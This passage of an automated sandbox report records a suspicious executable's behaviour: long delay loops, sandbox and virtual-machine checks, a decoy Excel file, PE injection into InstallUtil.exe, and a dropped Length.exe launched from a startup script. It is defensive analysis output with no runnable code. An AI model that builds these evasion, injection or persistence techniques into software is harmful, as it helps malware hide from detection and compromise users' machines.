                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98632s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98377s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98157s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -98032s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97907s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97782s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97666s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -97063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -96110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95885s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95779s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95649s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -95110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exe TID: 5372Thread sleep time: -94235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4488Thread sleep count: 961 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4488Thread sleep count: 1117 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99764s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99653s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99540s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -99074s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98946s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98817s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98467s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98351s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98220s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -98078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep count: 38 > 30
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -35048813740048126s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 1244Thread sleep count: 3141 > 30
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 1244Thread sleep count: 6687 > 30
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99777s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99556s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99446s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99232s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99123s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -99012s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98905s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98771s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98654s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98541s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -98109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97996s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97888s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97771s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97637s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -97078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96421s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96309s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -96093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95435s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95323s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -95088s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -94936s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -94828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Length.exe TID: 3412Thread sleep time: -94705s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\splwow64.exeLast function: Thread delayed
                      Source: C:\Windows\splwow64.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99782Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99657Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99532Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98938Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98632Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98515Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98377Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98266Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98157Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 98032Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97907Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97782Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97666Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97438Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97313Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97188Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 97063Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96953Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96844Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96719Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96610Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96235Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95885Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95779Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95649Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95547Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95438Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95328Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95219Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 95110Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94860Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94735Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94610Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94485Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94360Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeThread delayed: delay time: 94235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99764Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99653Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99540Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99074Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98946Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98817Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98467Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98351Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98220Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99777
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99556
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99446
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99343
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99232
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99123
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 99012
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98905
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98771
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98654
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98541
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98437
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98328
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98219
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 98109
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97996
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97888
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97771
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97637
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97531
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97422
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97297
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97187
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 97078
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96968
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96859
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96750
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96640
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96531
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96421
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96309
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96203
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 96093
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95984
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95875
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95765
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95656
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95546
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95435
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95323
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95218
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 95088
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 94936
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 94828
                      Source: C:\Users\user\AppData\Roaming\Length.exeThread delayed: delay time: 94705
                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                      Source: Length.exe, 0000000B.00000002.4608072366.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000006.00000002.4622064680.00000000054B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll94
                      Source: Ref#66001032.exe, 00000000.00000002.3460243396.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B56008Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Length.exe "C:\Users\user\AppData\Roaming\Length.exe"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeQueries volume information: C:\Users\user\Desktop\Ref#66001032.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
